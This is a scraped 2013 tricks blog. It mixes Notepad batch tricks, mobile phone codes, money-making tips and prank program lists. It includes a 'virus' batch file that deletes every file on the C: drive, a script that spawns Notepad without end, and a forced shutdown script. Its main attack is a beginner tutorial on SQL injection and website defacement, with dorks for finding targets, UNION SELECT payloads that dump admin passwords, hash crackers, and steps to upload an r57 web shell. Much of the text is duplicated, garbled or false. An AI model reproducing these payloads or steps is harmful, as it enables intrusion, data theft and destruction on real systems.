Sonic Tricks always tries to improve your sense of knowledge and give you a huge ammount of knowledge with great apps developed by us and tutorial as you wanted.
Friday, 27 December 2013
Stopwatch Sample for windows 8 store c#
http://code.msdn.microsoft.com/Stop-Watch-sample-For-2d40c49e
Tuesday, 3 December 2013
Top 12 Notepad Tricks
1) Notepad trick to use it as a Diary
@echo off
color 2
:start
echo %random% %random% % random% %random% %random % %random% %random% % random% %random% %random % %random% %random% % random% %random%
goto start
Save this file as Matrix.bat
Make sure the file type is kept as ALL FILES while saving it as a .bat file.
4) Notepad Trick to Open DVD Drive
- Open notepad
- Type .LOG
- Save the file as LOG.txt
- Write anything in it and it will be saved with the time when you edit it.
- Open Notepad.
- Copy the code give below in the notepad file:
X5O!P%@AP[4PZX54(P^) 7CC)7}$EICAR-STANDARD- ANTIVIRUS-TEST-FILE!$H+H* - Save it with an .exe extension like testvirus.exe
@echo off
color 2
:start
echo %random% %random% % random% %random% %random % %random% %random% % random% %random% %random % %random% %random% % random% %random%
goto start
Save this file as Matrix.bat
Make sure the file type is kept as ALL FILES while saving it as a .bat file.
4) Notepad Trick to Open DVD Drive
- Open Notepad.
- Copy the code given below onto the notepad file:
Set oWMP = CreateObject(“WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
- Save it as “Anything.VBS”.
- Open Notepad.
- Paste the following code in the notepad file:
@ECHO off
:Begin
msg * Hey
msg * Want to have Fun?
msg * You do?
msg * We will both have fun, alright?
msg * More fun?
GOTO BEGIN
6) Notepad Trick to shutdown computer forcefully
- Save the file with any file name but with .bat as extension and close it. For eg. cool.bat
- Open Notepad.
- Paste the following code in it:
@echo off
msg * Shutdown computer.
shutdown -c “Sleep Tight” -s7) Notepad Trick to Lock FoldersLets lock a folder using notepad trick which is named as PICS in your D: drive , whose path is D:PICSThen the code should be something like this:
ren pics pics. {21EC2020-3AEA-1069- A2DD-08002B30309D}Pics is your folder name. Use the name of the folder in place for pics. Save the text file as lock.bat in the same drive.To unlock this locked folder:Open another new notepad text file and type the following:
ren pics. {21EC2020-3AEA-1069- A2DD-08002B30309D} picsSave the text file as key.bat in the same drive. Here again, pics is the name of the folder. Change it to the folder name you want to lock it.8 ) Notepad Trick to type slowly
- Open Notepad.
- Paste the following code in the notepad file:
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject (“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate Notepad“”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “
- Save the file with any name and with .vbs extension and close it.
Now open the file and see how freakishly slow the messages appear!NOTE: In order to stop it. Follow the “Note” given in 10th Trick.9) Infinite Notepad Trick
- Open Notepad.
- Paste the following code in your notepad file:
@ECHO off
:top
START %SystemRoot% system32notepad.exe
GOTO top
- Save the file with any name nut with .bat extension and close it.
10) Notepad Trick - Text to Audio
- Open Notepad file on your Windows PC.
- Copy and paste the below mentioned code :
Dim msg, sapi
msg=InputBox("Enter your text for conversion www–.techvorm.com","TechVorm Text-To-Audio Converter")
Set sapi=CreateObject ("sapi.spvoice")
sapi.Speak msg- Save this file with any name with .vbs as extension. For eg. Text-To- Audio.vbs
11) Notepad Trick - BUSH HID THE FACTS12) Notepad Trick Print Tree Root
- Open notepad.
- Type BUSH HID THE FACTS
- Save that file.
- Close it
- Open It Again See…
Open NOTEPAD and enter {print tree root}
After that hit enter and type C:windowssystem
After that hit enter and type {print C:windowssystemwinlog
Hit enter and type 4*43″$@[455] 3hr4~
Then save the file as teekids in C:windowssystem.
13) World Trade Center Notepad Trick
Open your Notepad
Type the flight number Q33N
Increase the Font Size to 72
Change the Font to Wingdings
14) Notepad Trick to Format Hard disk
Open Notepad and type:
a) Code : 01001011000111110010010101010101010000011111100000
b) Save As it as anything.EXE
c) Run it. Beware that the entire HDD will be erased
I hope you enjoyed these awesome and cool Notepad tricks,
Creating Virus That Format C Drive
In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.
1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y
2. Then Save this file as virus.bat
3. Now, running this file format C Drive.
Matrix Effect Trick
matrix effect trick
In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.
1. Open Noteapad and copy below code into it.
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
2. Now save this file as Matrix.bat (name can be anything but .bat is must)
3. Open your saved file and you will have matrix effect on your screen.
In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.
1. Open Noteapad and copy below code into it.
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
2. Now save this file as Matrix.bat (name can be anything but .bat is must)
3. Open your saved file and you will have matrix effect on your screen.
Friday, 29 November 2013
Tuesday, 5 November 2013
Simple Mobile Tricks
SAMSUNG MOBILE SECRET CODES:-
*#9125#------Activates the smiley when charging.......
*#9998*228#---shows battery status............
*#9998*778#---sim service table
----------------------------------------------------
VODAFONE FREE 20rs recharge
-->Goto
-->Vodafone.in from mobile
-->Recharge menu
-->Enter password 8923115353
-------------------------------
FULL FORMS:-
FULL FORMS:-
GPRS--General Packet Radio Service
GPS--Global Positioning System
GSM--Global System for mobile
SMS--Short Message Service
3G---3rd Generati
--------------------------------------------------------
NOKIA CODES:-
*#7780#----Restore phone
Delete gprs set---*#353738#
Blue tooth On--*#2820
Call waiting--*43#
Show security code---*#30#
-------------------------------------------------
Free caller tune for vodafone users:-
Dial 54206090
Free SMS for Airtel:- 80855
sms ams to 55328 u will get 50 L/N sms daily
---------------------------------------------
New Idea Trick:-
>To Divert voice calls dial 9822001711
or
>Simply dial *62*+919822001711#
>Tested in Gujarat and Maharastra
--------------------------------------------------
Aircel GPRS activation:-
Reply to 121 with GPRS for GPRS setting
For wap setting do the same
MMS for MMS setting ... for all settings sms ALL
---------------------------------------------------
TOLL FREE NO's:-
-->MONSTER.com - 18004196666
-->SBT Bank:- 18004255566
-->UNION bank:- 1800222244
----------------------------------------------
Airtel Free song catcher :-
-->Dial 57878(Toll Free)
-->Airtel Free TV:- Just Type: TV & send to 54321
-->Airtel Free JOB ALERT:- *321*66# -------------------------------------------
Now you can ask balance from any other idea mobile friend:-
SMS- ASK to 55567... If ur frnd permits u can get bal
------------------------------------------
DTH Customer care Num's:-
Dish Tv:- 18601803474
Tata Sky:-18604256633
Big Tv:-18002009001
SunDth:-18002007575
Airtel Digital:-18001028080
-------------------------------------------
Nokia 1600 screen rotating trick:-
1.)dial *#5513#
*#5514#
*#5512#
*#5511#
----------------------------------------
Tricks for Nokia:-
-->Hide ur folder ICON
-->Rename Folder as Name.otb
-->Change Folder 2 Theme Icon as rename icon as name.nth
---------------------------------------
DTH Customer care Num's:-
Dish Tv:- 18601803474
Tata Sky:-18604256633
Big Tv:-18002009001
SunDth:-18002007575
Airtel Digital:-18001028080
-------------------------------------------
Nokia 1600 screen rotating trick:-
1.)dial *#5513#
*#5514#
*#5512#
*#5511#
----------------------------------------
Tricks for Nokia:-
-->Hide ur folder ICON
-->Rename Folder as Name.otb
-->Change Folder 2 Theme Icon as rename icon as name.nth
---------------------------------------
Dialed number retrieving in 1600:-
-->Save * on your contacts
-->Contact list& "Option"
-->select "call" option(dont press call button)
-->See diales no's
---------------------------------------
-->Save * on your contacts
-->Contact list& "Option"
-->select "call" option(dont press call button)
-->See diales no's
---------------------------------------
U can change ur dialer tune for free (Aircel):-
-->just sms DT FIND to 5300003 (toll free) It works in some states
-------------------------------------
-->just sms DT FIND to 5300003 (toll free) It works in some states
-------------------------------------
--> sms EXLPOWER 1st mobile no (space) 2nd mobile no to 53733
EX: EXLPOWER 9447XXXXXX 9446XXXXXX
----------------------------------------
EX: EXLPOWER 9447XXXXXX 9446XXXXXX
----------------------------------------
Nokia codes:-
-->See private No-- *#30#
-->Warranty--- *#92702689#4
-->mat--*#7370#*#7780#
-->product date--*#3283#
-----------------------------------------
-->See private No-- *#30#
-->Warranty--- *#92702689#4
-->mat--*#7370#*#7780#
-->product date--*#3283#
-----------------------------------------
Mobile number locator no need to install any software(for airtel):-
-->Type No 1st 4 digit to 51619
-->Ex: No 9888 to 51619
----------------------------------------- ----------
-->Type No 1st 4 digit to 51619
-->Ex: No 9888 to 51619
----------------------------------------- ----------
Toll Free numbers for any problems:-
-->NOKIA--18004253388
-->SAMSUNG---1800110011
-->SONY---1800111800
------------------------------------------------------------
-->NOKIA--18004253388
-->SAMSUNG---1800110011
-->SONY---1800111800
------------------------------------------------------------
Manual formatting of BB5 Nokia symbian phone 6600,6630,6680,6681,
7610,3230,N70,N72,N73,--- Models:-
Long press *,3,green button
-------------------------------------------------------------
7610,3230,N70,N72,N73,--- Models:-
Long press *,3,green button
-------------------------------------------------------------
Airtel offer Rs.5 (day pack):-
-500 L/N sms
Dial *555*01#
-50 MB data
DIal *555*02#
-A2A 5p/min (n8)
Dial *555*03#
-10 min STD IT
Dial *555*05#
-------------------------------------------------------------
SMS 4 Airtel:-
*123*1# :SMS balance
*123*10# : Limited GPRS balance
*123*3# : Local A2A balance
*125*4# : unlimited sms balance
*123*5$ : Guld balance
----------------------------------------------------------------
ACT SMSDD to 53739
This is for reliance GSM
Send to the given number Rs.1 will be deducted after that sms will be totally free for 1 yr
------------------------------------------------------------------
Sony ericsson hand sets on BSNL network Trick:-
Just type 'MY3GTV' and send it to 55447
u will receive a wap link download MiMobi Tv
----------------------------------------------------------------------
Want To recharge ur mobile online then go to:-
www.linx.in/rechargefree
--------------------------------------------------------------------
GSM tricks:-
To divert ur calls dial
**12*No.#
Cancel divert
##21#
To check status
*#21#
-----------------------------------------------------------
Hidden Trick for Nokia phones:-
-500 L/N sms
Dial *555*01#
-50 MB data
DIal *555*02#
-A2A 5p/min (n8)
Dial *555*03#
-10 min STD IT
Dial *555*05#
-------------------------------------------------------------
SMS 4 Airtel:-
*123*1# :SMS balance
*123*10# : Limited GPRS balance
*123*3# : Local A2A balance
*125*4# : unlimited sms balance
*123*5$ : Guld balance
----------------------------------------------------------------
ACT SMSDD to 53739
This is for reliance GSM
Send to the given number Rs.1 will be deducted after that sms will be totally free for 1 yr
------------------------------------------------------------------
Sony ericsson hand sets on BSNL network Trick:-
Just type 'MY3GTV' and send it to 55447
u will receive a wap link download MiMobi Tv
----------------------------------------------------------------------
Want To recharge ur mobile online then go to:-
www.linx.in/rechargefree
--------------------------------------------------------------------
GSM tricks:-
To divert ur calls dial
**12*No.#
Cancel divert
##21#
To check status
*#21#
-----------------------------------------------------------
Hidden Trick for Nokia phones:-
-->Try this code : *#746025625#
-->This code stop ur sim clock in all nokia mobile phones
-->This code stop ur sim clock in all nokia mobile phones
Airtel Free Hello Tune:-
-->Balance-->1
-->Balance-->1
-->Then switch off ur mobile for 2 hours
-->Done
----------------------------------------------------------
BSNL trick:-
-->Send ur sim num to 53733 for puk number...
------------------------------------------------------
------------------------------------------------------
Samsung codes:-
-->Soft---*#9999#
-->Version--*#0837#
-->Battery info--*#0228#
-->GPRS TOOL---*#4777*8665#
-->Call list--*#2255#
-->Firm ware--*#1234#
-->Soft---*#9999#
-->Version--*#0837#
-->Battery info--*#0228#
-->GPRS TOOL---*#4777*8665#
-->Call list--*#2255#
-->Firm ware--*#1234#
EARN MONEY BY READING SMS
on 9:33 AM
SMS marketing is increasing very rapidly in India. Anybody can earn just by receiving advertisement through SMS. Now a days lots of companies are in this field but only few of them are authentic and really pays.
mGinger :This is one of the best and oldest Indian "paid to read SMS" website. This site is still operational and growing at a very fast pace.mGinger till now paid 1.32 crore to its users.
Get SMS ads of only those products that you want to buy.
Get ads at your convenience.
Get ads at your convenience.
Get number of ads as many as you want.
Save money through discount coupons and offers.
Save money through discount coupons and offers.
- Earn much more money by inviting family and friends
Get 20 paisa for every ad you receive
Get 10 paisa for every ad your friends receive
Get 5 paisa for every ad your friend's friends receive
Get 10 paisa for every ad your friends receive
Get 5 paisa for every ad your friend's friends receive
- Refer your friends and get Rs 2 on each valid referral:
Payment Proof :
CLICK HERE TO JOIN mGinger OR VISIT WWW.mGinger.COM
YOUMINT : Youmint is just like mginger. It is also one of the good site to earn some extra money just by reading SMS.Over 30,00,000 have joined Youmint and this number is increasing day by day.YouMint pays you to invite friends and to receive SMS promos! It might just pay your Mobile bill.
NEW AIRTEL FREE GPRS TRICK SEPTEMBER 2009
on 10:56 AM
Good news for Airtel users.Finally after a long period of time we found a 100% working Airtel Free GPRS Trick.This trick is successfully implemented on my Airtel mobile.
So I am going Share this trick :
To Activate Mobile office for airtel mobile Contact customer care for how to activate airtel mobile office on my mobile..!!
So I am going Share this trick :
- First of all you have download opera v4.2 or v5.0 mini browser
- To download opera v4.2 mini browser CLICK HERE.
- To download opera v5.0 mini browser CLICK HERE.
- After downloading opera install this application it takes around 2-3 minitues to configured
- Activate AIRTEL Mobile Office -for that you have atleast 30 Rs Balance.
- After Mobile Office Activation -DONT OPEN/BROWSE ANY WEBSITE THROUGH BROWSER- EXCEPT OPERA v4.2 or v5.0 OTHER WISE AIRTEL WILL CHARGED YOU 15 RS. FOR THHAT DAY.
Now you can browse any site for free on opera mini ...
To Activate Mobile office for airtel mobile Contact customer care for how to activate airtel mobile office on my mobile..!!
ACTIVATING AND SETTING UP BSNL 3G
on 1:23 PM
BSNL 3G Activation:
BSNL 3G Settings / Configuration :
Configuring 3G is easy and similar to GPRS.
For manual configuration create a new account
Account Name - BSNL 3G
Username -
Password -
Proxy - disabled/no
Homepage - www.google.com
Proxy and Server address -
Proxy and Server Port -
Acces Point Name - gprsnorth3g.bsnlmobile.in or bsnlnet (For all Zones)
To activate BSNL 3G service recharge your BSNL mobile with RS 1 or it will be automatically activated if you activate your sim using Rs 350 or above activation voucher .
To register online for 3G Click Here .
BSNL 3G Settings / Configuration :
Configuring 3G is easy and similar to GPRS.
To download settings automatically to your mobile:
Send SMS (Handset model) Eg NOKIA N82 OR SAMSUNG SGH-D526 to 58355 [Toll free]
For manual configuration create a new account
Account Name - BSNL 3G
Username -
Proxy - disabled/no
Homepage - www.google.com
Proxy and Server Port -
Now go to your mobile "Network Selection" and select mode as UMTS or WCDMA.
Make sure your phone is working on 3G network. If 3G is not available somewhere it will work on 2G network automatically .
5 Ways To Earn Money Online
We are living in digital world every thing on this planet is also digital. Many of us want to earn good money and it will best if u get it from home...which requires your own best skills and having talent you have....
Online is thrust for hard working as well as for talented people, I think every body have some talent , it is on you, when you will come to know "your talent", online is the best place to know your talent as well as show talent, because if you want to know your talent then you have to start doing something which will lead you to know your talent. we have to know that without having any hard work u get nothing over here...so keep passion and just go over it..for your best carrier
here is the collection of the best 5 ways to generate real money for u...
1) Blogging
Blogging is most common and you can make lots of money by blogging but their is bad side of it that you can not earn money over night. If you dont have patience then blogging is not for you. just leave the idea now it will like waisting of time for u. It requires lots of efforts and patience. But once you have established successfull blog you can earn lots of money by monetizing your blog. But if you want to earn some real fast then below are some other ways to make money online. However if you are high school student then you must start your blog today because you have plenty of time require for blogging and before you will enter college you will be earning good amount of money. it takes many more time u have to work smoothly here...having daily updates here...then will happen something otherwise nothing ....
2) Freelancer
3) Uploading Videos to Youtube
Argentina, Australia, Brazil, Canada, the Czech Republic, Germany, Spain, France, the United Kingdom, India, Ireland, Israel, Italy, Japan, New Zealand, Mexico, the Netherlands, Poland, South Africa, South Korea, Sweden and the United States.
here is the collection of the best 5 ways to generate real money for u...
1) Blogging
Blogging is most common and you can make lots of money by blogging but their is bad side of it that you can not earn money over night. If you dont have patience then blogging is not for you. just leave the idea now it will like waisting of time for u. It requires lots of efforts and patience. But once you have established successfull blog you can earn lots of money by monetizing your blog. But if you want to earn some real fast then below are some other ways to make money online. However if you are high school student then you must start your blog today because you have plenty of time require for blogging and before you will enter college you will be earning good amount of money. it takes many more time u have to work smoothly here...having daily updates here...then will happen something otherwise nothing ....
2) Freelancer
Freelancing is no longer conserved a ‘to be looked down upon’ profession. Hundreds of people have in surged into freelancing with confidence.Anyhow, since most people work with freelancing projects online, there is a concern about how to bargain with customers when not dealing face to face.Freelancer is the best best ways to make money with free mind, here is the thing for you, actually you can make unlimited money, but the main important thing is that you must be master in your field, because there are many freelancers like you in the world those wanted to make money.
May be you are thinking, how would you find those jobs, yes this is the main thing of this part, once again it is quiet difficult to find out real jobs.
I got many many websites those are providing this service but I would like to tell you only best website-
Freelancer.com
This is a great platform to work for others and make money, no matter in which country you are living, people like work not living place, if you have capability to do work then this is the great place to show your talent, because world of people are living here to see someone talent.
Not much but learn little video editing that you could learn over the internet. Start making quality videos and apply for youtube program. Below are list of countries where youtube partnership is available. It is a great way to earn money online . Some people are earning more than 10k$ in a month which is a great amount.
Here i am using some of the best steps by which you can insert the relevent videos...and able to earn huge amount....
How to upload videos
To get started uploading videos on YouTube, follow the steps below:
- Sign into YouTube.
- Click the Upload link at the top of the page.
- Select the video you'd like to upload from your computer. You can also record a video from your webcam, or create a video slideshow.
Once the upload is completed we will send you an email to notify you that your video is done uploading and processing. You can then forward that email to friends or family for easy sharing. If you prefere not to receive notification, you can opt out by visiting your email setting.
4) Make Money Online By Sharing Your Files
Sharing your informative and different formats file on differentfile sharing sites is also one of the popular methods of earning money online.
Do you really think you have files, those are created by you and those files are really useful for others, then you are not doing some thing big, that is you are not sharing your files in the internet to make money online.
Actually this is a good method to make money online but you should have some useful files for people.
Actually this is a good method to make money online but you should have some useful files for people.
In this way, Hosting your Files and Sharing them is one of the popular as well as powerful way. There are many websites available on Internet world where you can upload your files for free, get the public links and share them with world. You will get paid either from PPD (Pay-Per-Download) Program, PPS (Pay-Per-Sale) or by PPC (Pay-Per-Click) or from both.
Here, I am telling you Top 10 Best File Hosting & Sharing Websites which are very popular, trusted and having highest paying scheme. Have a look !
Docstoc is one of the best file sharing website which lets you to upload documents of doc, xls, ppt, pdf, rtf, txt, docx, xlsx and ppts format. You can sell your documents to their marketplace and also generate revenue over.
5) Online Surveys
There are many websites which pays you for taking surveys. The aim of such comapnies or website is to get feedback and do market research on a product. This is easiest among all ways listed here to make money online. Sign up for as many websites you can and start taking surveys to make some extra bucks. Such Few sites are listed below.
hope that u will appericate this efforts to collecting this..best way to generate the revenue form here leave comment here......
How to Unlock Android Pattern Lock And Password Lock
Android is most used OS in the cell phone today’s everybody use android phones now days. this is a android is LINUX based operating system provide by Google. android phones is very easy to access there is lot of companies who sell android phones. Biggest seller of android is Samsung and HTC and many other who made android based phones. today every one wants higher configuration phones so there is lot of phones today i like s3 and Samsung note these phones are very fast and good to use but little expensive for everyone. in today there is lot of apps for android available for Google play store you can download free of coast of buy some apps very easily . How To Unlock an Android Pattern droid phones is easy to accessible and you can play every thing in this phones there is LAKH’S of app for android is available in the play store there is many inbuilt apps available for most android p hones .there is many ways to give security to your phones with some apps you can use inbuilt unlock pattern or unlock codes for easy security you can also download some unlock codes app from play store easily.. there is lot of games available for phones the most used app is TEMPLE RUN 2 and many other these are free of cost apps available for everyone in the play store app in the android phones.
Steps On How to Unlock Android Pattern Lock Or Password
To get your pattern lock or password of your android device unlocked please follow the instructions well and am sure you will get what you are going to get your device unlocked without problem.
- First you will switch of your Android device.
- After switching of your android device, press your up volume button and Press It down.
- Now press the power button and hold it too along with the volume up button.
- It will start a secret terminal interface.
- Then press to use home button for scroll up and down.
- Then you will get to the choose option DELETE ALL USER DATA.
- Select the option and wait
- Your device will take some time but after it will restart and you will find out your android device has been unlocked.
Conclusion
These above method will help you unlock your android phone which have been lock by password or even the popular pattern lock easily but NOTE by performing this method you will loose all your contacts and everything on your phone, everything will be back to default as you bought the android device. I hope you understand how to unlock Android Pattern lock and password easily.
Monday, 16 September 2013
Saturday, 14 September 2013
A very simple way to hack website 4 beginners
SQL Injection And Defacement For Beginners Complete Tutorial By (S0H4N D 4CE)[H4CKNTRICKS!!]
What do you need before you start with SQL Injection.
*You need Admin Finder ( to find admin panel from website )*
*SQL Injection Vulnerable Scanner*
Admin Finder:
Download Admin Finder
Vulnerable Scanner:
Download ADVANCED HAVIJ Scanner
Dorks for Finding Vulnerable sites!:
Common Dorks
inurl:members.php?id=
inurl:page.php?id=
inurl:login.php?id=
inurl:index.php?id=
inurl:register.php?id=
inurl:staff.php?id=
inurl:detail.php?id=
inurl:view.php?id=
MD5 Hash Crackers Online:
http://www.md5crack.com
http://www.md5decrypter.com
http://www.md5decrypter.co.uk
http://md5.rednoize.com
http://md5decryption.com
http://www.md5decrypter.com
http://passcracking.com
http://md5.my-addr.com/md5_decrypt-md5_c…r_tool.php
http://www.xmd5.org
http://www.md5cracker.com/index.php
http://md5.noisette.ch/index.php
http://md5cracker.org
Text to ASCII Converter:
http://www.mikezilla.com/exp0012.html?ascii=login&hex=%2578&unicode=%26%23120;
http://getyourwebsitehere.com/jswb/text_to_ascii.html
Shell:
http://www.kinginfet.net/shells/
Some vulnerable websites
Starting Tutorial:
1. First you need to find vulnerable website.
http://sql-vuln-site.com/index.php?id=15
2. Now you need to find columns.
http://sql-vuln-site.com/index.php?id=15 order by 1-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 2-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 3-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 4-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 5-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 6-- ( error )
Error’s looks like this:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’39′ at line 1
database query failure- SELECT * FROM texecom_sidemenu WHERE id=’39
3. Now Select columns
Columns is 5
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT 1,2,3,4,5–
4. Finding version.
So if you not go the bold number 1 , 2, 3 , 4 one of them you will try all.
I choose 1
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT @@version,2,3,4,5–
you got the version like this:
5.0.32-Debian_7etch11-log
5. Finding Tables
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT table_name,2,3,4,5 from information_schema.tables–
And you will got tables like this:
PRODUCTS , ADMINS , and others
So must be there table by name: admin , users , user , login , client.
6. Finding Columns in the Table ADMINS.
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char()–
We found ADMINS table now go to ASCII web and convert ADMINS
You will got this ADMINS
Remove &# and replace ; to ,
Like this: 65,68,77,73,78,83
You put table_name=char(65,68,77,73,78,83)–
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char(65,68,77,73,78,83)–
And you will got the columns in table ADMINS
There need to have columns with names: username and password
7. Getting username and password.
Now we put concat(username,0x3a,password) and admins
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT concat(username,0x3a,password),2,3,4,5 from admins–
( 0x3a is ASCII )
8. Finded username and password
So you found the username and password
if the password is hash like this: 2510c39011c5be704182423e3a695e91
you will need to use MD5 Hash Online Crackers.
If password is not hash you are lucky and now you need to find admin panel.
9. Finding Admin Panel
Open the tool Admin Finder
Put the website in the bellow and click Scan.
So you found admin panel and it looks like this http://sql-vuln-site.com/admin/login.php
You open website and there have Username: Password:
Put username and password what you got.
Done you login in Admin Panel lets upload shell and deface.
10. Uploading Shell and Add Deface
In Admin Panel you will search categories or anything where you can upload a file or picture.
When you found, you will download shell from the website who i tell you before start tutorial so you will try to upload your shell like: r57.php when you upload it you will see the link of the upload and open it like this:
http://sql-vuln-site.com/upload/r57.php
If can’t upload r57.php change it to r57.jpg.php or r57.txt and try!
You need to make a deface page in html and put in the website
So you open the shell,you will found a file index.php and click on it and there you will remove the php code from index and put your html code.
Congratulations you deface the website.
Thanks For Reading..
Friday, 13 September 2013
Monday, 2 September 2013
40+ Computer Pranks To Play On Your Friend Computer

Although it quite late now, but the April fool day has not ended and moreover I just want to blog about these computer pranks which you can play on your friend computer any day you want to.
computer-prank
We will tell you some of the hilarious computer tricks with which you can annoy your friend any time you want irrespective of any april fool day. All these are portable so they do not require any installation on the target computer and you can remove them anytime just by deleting the program exe.
Here is the list of all these computer pranks with their descriptions about what they do.
Add/Remove
Pretends to remove all of the software from your machine using the standard Windows Add/Remove Programs.
Avoid
A harmless prank that makes your Windows start button avoid your mouse!
Backwards Mouse
Backwards mouse will reverse all mouse movements on the desktop.
Blue Screen of Death
This prank simulates the Windows
Bomb
Use the Bomb program when you want to display that dreaded Windows Illegal Operation message dialog box.
Click Me
Want someone to have fun chasing a button around the screen? This Click Me jumps out of the way each time someone tries to click it.
ClickStart
The ClickStart prank will click the users start button every 45 seconds. This is a very annoying prank!
Clippy
Prank someone with this fake, customizable Clippy assistant.
Copy Cursor
Replicate the mouse cursor to random positions on the screen.
Crazy Num Caps Scroll
This program is truly a jokesters dream. It will allow you to setup the toggling of the Caps, Num and Scroll lock keys.
Cursor Fun
Cursor Fun is a hilarious gag program that randomly changes the appearance of the mouse cursor.
Dirty Mouse
Prank someone by making them think their mouse ball is dirty or their optical mouse is not responding.
DownHoax
DownHoax is an Internet Explorer compatible download simulator. The servers it accesses, as well as the files it downloads, are completely bogus.
Email Fun
Email Fun is an amusing prank simulates emailing everyone in your address book.
Fake Delete
Fake Delete is the perfect prank to play on any unsuspecting user. It simulates deleting a specified directory from the machine. Very realistic, even power users will be fooled.
Fake Format
Fake Format was created by popular demand, and pretends to format a specified drive. Very realistic dialogs, summaries, and even hard drive chatter.
Fake Shutdown
Fake Shutdown is a gag that looks like you tried to shutdown Windows.
Fake Start Menu 95
Fake Start Menu replaces the Windows 95 Start Menu (task bar) with a fake one that will not respond to anything.
Flasher
Flash a subliminal message to the computer screen.
Flip It
Flip It is the craziest Windows message you have ever seen!
Floppy Madness
Drive someone MAD with this random floppy drive cruncher.
Follow Me
With this software your Windows Start Button will horizontally follow your mouse cursor across the task bar.
Gas Gripe
Gas Gripe is a fun program that spoofs current gasoline prices.
HeadAche
HeadAche is a program that will give you a headache. Don't believe it? Run it and see.
Mime Mouse
If you want mouse mischief this is the program for you. Mime Mouse will randomly limit the mouse cursor to an area on the screen.
Mouse Droppings
Make your mouse poop all over the screen with this dirty little prank!
Mouse Mayhem
Ever wanted to take control of your friends mouse and make it simulate mouse actions? Well you can with Mouse Mayhem.
Mouse Move
Want to randomly move the mouse cursor? Download this free software.
MouseClicks
A fun prank program that will disable the users mouse clicks!
Password Prank
Password Prank displays a bogus password dialog screen, then errors when keys are pressed.
Pirated Software
Make someone think they are installing pirated software with this prank.
Popup Prank
Fool your friends into thinking their photo is in an online popup advertisement.
PowerSave Prank
A harmless prank that puts your screen into power save mode.
Print Me
Print Me is a bogus print dialog prank program that is thorough enough to trick the most skillful user.
Program - WAV Launcher
This program is a hidden launcher that will puzzle any user as to why programs or .wav files are randomly being launched.
Random Burper
This hidden software will randomly play disgusting burp sounds every minute.
Random Farter
Random Farter is a hidden fart sound player. It will randomly play disgusting fart sounds every minute until it is closed.
ReplaceKeys
The ReplaceKeys prank replaces key presses with other keyboard keys.
Rotate
If you want to randomly manipulate the desktop, Rotate is just for you.
Screen Screw
Want to screw with someones screen? Download this free prank!
Shakedown
Never fear, Shakedown is here! Rattle your desktop on wild and crazy ride.
Show - Hide Desktop
Show - Hide Desktop is a prank that will show and then hide your Windows desktop icons.
The Finger
The Finger is a hilarious joke program that will flash the mouse cursor to a hand with the middle finger up and then back to the normal cursor again.
Time Traveler
The Time Traveler prank changes your system clock to a random time, every 30 seconds.
Vista Upgrade Prank
Gag that simulates an upgrade to Microsoft Windows Vista.
Y2K Joke
Y2K is the perfect joke for anyone familiar with the millenium bug. This program has it all - from changing all letter Ys to letter Ks, to pretending to correct the mouse's Y2K problem. This gag is hilarious!
Subscribe to:
Comments (Atom)